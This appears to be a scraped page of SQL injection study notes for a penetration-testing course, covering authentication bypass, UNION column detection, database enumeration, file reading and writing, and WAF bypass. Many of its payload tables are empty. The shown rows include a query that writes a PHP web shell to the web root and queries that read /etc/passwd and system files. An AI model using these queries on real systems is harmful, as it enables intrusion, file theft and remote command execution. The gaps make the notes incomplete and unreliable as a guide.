SQL Injection
payload
return
SQLi Discovery
Payload | URL Encoded |
---|---|
|
|
|
|
|
|
|
|
|
|
Authentication Bypass
Comments
We can use two types of line comments with MySQL --
and #
, in addition to an in-line comment /**/
Auth Bypass with comments
Put spaces after --
Union
Detect number of columns
Using ORDER BY
Until we reach a number that returns an error
This means that this table has exactly 4 columns .
While a query may return multiple columns, the web application may only display some of them. So, if we inject our query in a column that is not printed on the page, we will not get its output. This is why we need to determine which columns are printed to the page, to determine where to place our injection.
We cannot place our injection at the beginning, or its output will not be printed.
Database Enumeration
Fingerprinting
Payload | When to Use | Expected Output | Wrong Output |
---|---|---|---|
| When we have full query output | MySQL Version 'i.e. | In MSSQL it returns MSSQL version. Error with other DBMS. |
| When we only have numeric output |
| Error with other DBMS |
| Blind/No Output | Delays page response for 5 seconds and returns | Will not delay response with other DBMS |
Database
Find the current database with the SELECT database()
query
Tables
Columns
Data
Remember: don't forget to use the dot operator to refer to the 'credentials' in the 'dev' database, as we are running in the 'ilfreight' database, as previously discussed.
Reading Files
MySQL (3306)DB User
User Privileges
Y
= yes, super_priv
If we had many users within the DBMS:
Other privileges:
FILE
privilege is listed for our user, enabling us to read files and potentially even write files
Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.
Write Files
To be able to write files to the back-end server using a MySQL database, we require three things:
User with
FILE
privilege enabledMySQL global
secure_file_priv
variable not enabledWrite access to the location we want to write to on the back-end server
secure_file_priv
value is empty, meaning that we can read/write files to any location.
Tip: Advanced file exports utilize the 'FROM_BASE64("base64_data")' function in order to be able to write long/advanced files, including binary data.
Web Shell
Note: To write a web shell, we must know the base web directory for the web server (i.e. web root). One way to find it is to use load_file
to read the server configuration, like Apache's configuration found at /etc/apache2/apache2.conf
, Nginx's configuration at /etc/nginx/nginx.conf
, or IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config
, or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using this wordlist for Linux or this wordlist for Windows. Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.
Ressources
Payload
More than CPTS
Fragmented SQL Injection - two endpoints
Let’s take a look at an instance where the single quote is blacklisted or escaped from the command.
As you see in this example, because the single quote (‘) is escaped with a backslash, the payload does not work as intended by the hacker.
The backslash neutralizes the following single quote. So the value for the username column will end with the single quote that comes right after password= (the end of the gray text). Doing so will eliminate the required password field from the command. Due to the or 1 command, the condition will always return ‘true’. The # (hash) will ignore the rest of the function, and you’ll be able to bypass the login control and login form.
Bypass - WAF / Filters
No Space (%20) - bypass using whitespace alternatives
No Whitespace - bypass using comments
No Whitespace - bypass using parenthesis
No Comma - bypass using OFFSET, FROM and JOIN
Blacklist using keywords - bypass using uppercase/lowercase
Blacklist using keywords case insensitive - bypass using an equivalent operator
Information_schema.tables alternative
Version alternative
Source:
Reading / Writing Files
Requires privileged user
Description | Query |
---|---|
Dump to file | SELECT * FROM mytable INTO dumpfile '/tmp/somefile' |
Dump PHP Shell | SELECT 'system($_GET['c']); ?>' INTO OUTFILE '/var/www/shell.php' |
Read File | SELECT LOAD_FILE('/etc/passwd') |
Read File Obfuscated | SELECT LOAD_FILE(0x633A5C626F6F742E696E69) reads c:\boot.ini |
File Privileges | SELECT file_priv FROM mysql.user WHERE user = 'netspi' SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%' |
Resources
Payload
Tools
SQLMAPLast updated